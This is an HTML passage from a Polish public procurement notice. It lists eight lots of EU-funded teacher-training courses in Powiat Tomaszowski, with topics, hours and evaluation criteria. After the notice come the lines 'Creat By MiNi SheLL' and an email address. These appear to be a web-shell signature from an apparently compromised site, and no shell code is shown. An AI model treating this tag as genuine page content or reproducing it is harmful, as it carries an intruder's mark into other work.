<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane jest w ramach projektu pn. Nowe jutro, lepsze jutro - kompleksowy system doskonalenia Nauczycieli i Dyrektorów w Powiecie Tomaszowskim w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet III - Wysoka jakość systemu oświaty Działanie 3.5 - Kompleksowe wspomaganie rozwoju szkół..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> część I - doskonalenie nauczycieli - 1 (111 godzin).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Przewidywana tematyka szkoleń	Liczba godzin
1	Uczymy się bawiąc - techniki aktywne w pracy z dziećmi przedszkolnymi  	6
2	Metoda projektu w pracy z dziećmi przedszkolnymi	12
3	Skrzynia pełna różności - metody i ćwiczenia rozwijające twórcze myślenie dzieci przedszkolnych	12
4	Zabawy, pląsy w pracy z dziećmi w wieku 3-6 lat	6
5	Praca z uczniem metodami aktywnymi wspomagającymi osiąganie sukcesu. Rozwijanie twórczego i kreatywnego myślenia uczniów	6
6	Za siedmioma górami - wykorzystanie bajki i relaksacji w pracy  z dzieckiem	6
7	Pedagogika zabawy w pracy z małym dzieckiem	12
8	Możliwości psychofizycznych dzieci w wieku przedszkolnym w obliczu wymagań stawianych przed 6- latkiem	3
9	Pedagogika zabawy w pracy z dzieckiem w wieku przedszkolnym	6
10	Metody i techniki aktywizujące dzieci w wieku przedszkolnym	6
11	Nowatorskie metody pracy - metoda projektu - nabywanie umiejętności stosowania ich w codziennej pracy z dziećmi	6
12	Rola, sposoby i formy motywacji dzieci w wieku szkolnym /wielopoziomowość nauczania/	3
13	Metodologia pracy z uczniem na różnych etapach kształcenia  (dobór metod pracy w zależności od  predyspozycji, wieku, możliwości intelektualnych uczniów)	3
14	Rola rodziny w motywowaniu dzieci do nauki na różnych etapach kształcenia	3
15	Jak pomóc uczniowi osiągnąć sukces?	3
16	Rozwój psychofizyczny i możliwości percepcyjne uczniów najmłodszych w szkole, higiena pracy dziecka w młodszym wieku szkolnym	6
17	Metodologia pracy z uczniem 6-letnim  ( dobór metod pracy) dla nauczycieli klas I- III oraz uczących przedmiotów- wychowanie fizyczne, języki, religia, wychowawcy świetlicy	3
18	Jak wspierać i motywować dzieci młodsze do nauki szkolnej	3
19	Jak pracować w klasach zróżnicowanych wiekowo	3
20	Gry i zabawy rozwijające umiejętności matematyczne	3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Kadra i zasoby - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> część II - doskonalenie nauczycieli - 2 (6 godzin).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Przewidywana tematyka szkoleń	Liczba godzin
1	Metoda Kinezjologii Edukacyjnej Dennisona w pracy z dzieckiem	6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Kadra i zasoby - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> część III - doskonalenie nauczycieli - 3 (66 godzin).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Przewidywana tematyka szkoleń	Liczba godzin
1	Jak radzić sobie w sytuacjach konfliktowych?	3
2	Jak rozpoznać ryzyko specyficznych trudności w uczeniu się u dzieci z klas młodszych?	3
3	Zaburzenia zachowania i agresja u dzieci w wieku przedszkolnym	6
4	Jak pomóc rodzicom dzieci ze specjalnymi potrzebami edukacyjnymi	6
5	Praca z dzieckiem o specjalnych potrzebach edukacyjnych	3
6	Praca z uczniem słabym niezmotywowanym. Praca z uczniem zdolnym niezmotywowanym.	3
7	Praca z dzieckiem wycofanym	3
8	Motywowanie ucznia słabego do osiągania sukcesu	3
9	Motywowanie ucznia z trudnościami edukacyjnymi  do systematycznej pracy i do osiągania sukcesu na miarę swoich możliwości	6
10	Umiejętność rozwiązywania sytuacji konfliktowych w grupie  dorosłych i dzieci	3
11	Metody  pracy z dziećmi o różnych potrzebach edukacyjnych- wady wymowy, nadpobudliwość, orzeczenia o niepełnosprawności;  uczeń zdolny	3
12	Rozwój psychomotoryczny dzieci a potrzeby edukacyjne w wieku przedszkolnym	3
13	Jak interpretować rysunki dziecka?	3
14	Wspomaganie dzieci w rozumieniu tego, co trudne - w skupieniu uwagi, ćwiczeniu pamięci i wspomaganiu zapamiętywania informacji uporządkowanych	3
15	Stosowanie aktywizujących metod pracy na zajęciach z: języka polskiego, języka obcego, matematyki, edukacji wczesnoszkolnej, w-f, przyrody i techniki	6
16	Organizacja procesu lekcyjnego z uwzględnieniem zróżnicowanego poziomu opanowania wiedzy	6
17	Rozpoznawanie i wspieranie dziecka z dyskalkulią	3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Kadra i zasoby - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> część IV - doskonalenie nauczycieli - 4 (30 godzin).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Przewidywana tematyka szkoleń	Liczba godzin
1	Behawioralne metody pracy z dziećmi w wieku przedszkolnym. Jak motywować do działania, jak wyciszać niepożądane zachowania, jak radzić sobie z agresją? Praca w oparciu o konkretne przykłady i nowoczesne metody.	3
2	Motywowanie i angażowanie do działania dzieci z zaburzeniami zachowania lub specyficznymi trudnościami. Wypracowanie metod pracy z dzieckiem nadpobudliwym, z deficytami uwagi i nadmiernie wyciszonym, wycofanym emocjonalnie, mało aktywnym.	6
3	Behawioralne metody pracy z dziećmi w klasach 0-III. Jak radzić sobie z trudnymi zachowaniami i postawami uczniów?	3
4	Metody pracy z dzieckiem nadpobudliwym.	3
5	Praca z dzieckiem z zaburzeniami uwagi	3
6	Metody pracy grupowej z dziećmi z zaburzeniami zachowania	6
7	Jak pracować w szkole z uczniem posiadającym orzeczenie do kształcenia specjalnego z uwagi na upośledzenie umysłowe w stopniu lekkim	3
8	Metody pracy z dzieckiem dysfunkcyjnym	3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Kadra i zasoby - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> część V - doskonalenie nauczycieli - 5 (21 godzin).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Przewidywana tematyka szkoleń	Liczba godzin
1	Jak pracować z dzieckiem w wieku przedszkolnym ze spektrum autyzmu i z ADHD?	3
2	Metody behawioralne.	6
3	Droga edukacyjna dziecka z autyzmem.	3
4	System kar i nagród w pracy z dzieckiem w wieku przedszkolnym. Jak dobierać i stosować kary i nagrody w procesie edukacji i wychowania. Praca w oparciu o konkretne przykłady i nowoczesne metody.	3
5	Jak motywować i angażować do działania dzieci z zaburzeniami zachowania lub specyficznymi trudnościami - wypracowanie metod pracy z dzieckiem z Zespołem Aspergera i autyzmem.	6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Kadra i zasoby - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> część VI - doskonalenie nauczycieli - 6 (123 godziny).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Przewidywana tematyka szkoleń	Liczba godzin
1	Komunikacja interpersonalna, asertywność, informacja zwrotna.	6
2	Efektywna organizacja zespołów nauczycielskich.	6
3	Jak skutecznie rozmawiać z rodzicami?	3
4	Jak radzić sobie w sytuacjach stresowych i być asertywnym?	3
5	Problemy komunikacyjne w relacjach nauczyciel - rodzic dotyczące przekazywanych informacji o uczniu i możliwościach ich przekazywania.	3
6	Nauczyciel wobec trudnych postaw uczniów. Jak radzić sobie z agresją, nieposłuszeństwem, spóźnieniami, wagarami.	3
7	Znajomość najnowszych technik i metod skutecznej komunikacji do zastosowania w relacjach: nauczycieli - rodzic, nauczyciel - uczeń.	6
8	Praca metodami wspierającymi i motywującymi ucznia zdolnego. Rozwijanie kreatywności i twórczego myślenia	6
9	Umiejętności praktyczne dotyczące sztuki mediacji i negocjacji.	12
10	Wywiadówka bez porażek. Nie wiem jak pani powiedzieć.
Przekazywanie rodzicom trudnych informacji.	12
11	Metoda dialogu motywującego. Praca z trudnym uczniem.	18
12	Współpraca z dysfunkcyjną rodziną ucznia.	3
13	Poszerzenie kompetencji w zakresie komunikacji społecznej i  pracy zespołowej szkolenie	3
14	Motywacja  w pracy nauczyciela stres, elementy wypalenia zawodowego.  Jak sobie radzić ?	9
15	Poszerzenie kompetencji w zakresie umiejętności komunikowania się w organizacjach - elementy treningu interpersonalnego	6
16	Najnowsze techniki i metody skutecznego rozwiązywania konfliktów w  społeczności szkolnej.	3
17	Strategia uczenia się - Jak uczyć efektywnie i ciekawie?	6
18	Rozpoznawanie i wspieranie potencjału rozwojowego ucznia zdolnego.	3
19	Jak tworzyć i podtrzymywać motywację do nauki języka obcego?	6
20	Metody aktywizacji ucznia na lekcjach języków obcych.	3
21	Fabryka opowieści.	3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Kadra i zasoby - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> część VII - doskonalenie nauczycieli - 7 (6 godzin).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Przewidywana tematyka szkoleń	Liczba godzin
1.	Techniki i metody pracy z dzieckiem z FAS i z niedostosowaniem społecznym 	6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Kadra i zasoby - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> część VIII - doskonalenie nauczycieli - 8 (45 godzin).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Przewidywana tematyka szkoleń	Liczba godzin
1	Techniki efektywnego uczenia się i zapamiętywania.	9
2	Najnowsze techniki uczenia się, zapamiętywania i metody aktywizujące oraz narzędzia do motywowania.	15
3	Techniki nauczania oraz metody aktywizujące 	12
4	Psychologiczne aspekty motywowania uczniów do nauki 	6
5	Praca z uczniem o specyficznych trudnościach w uczeniu się	3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Kadra i zasoby - 40</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com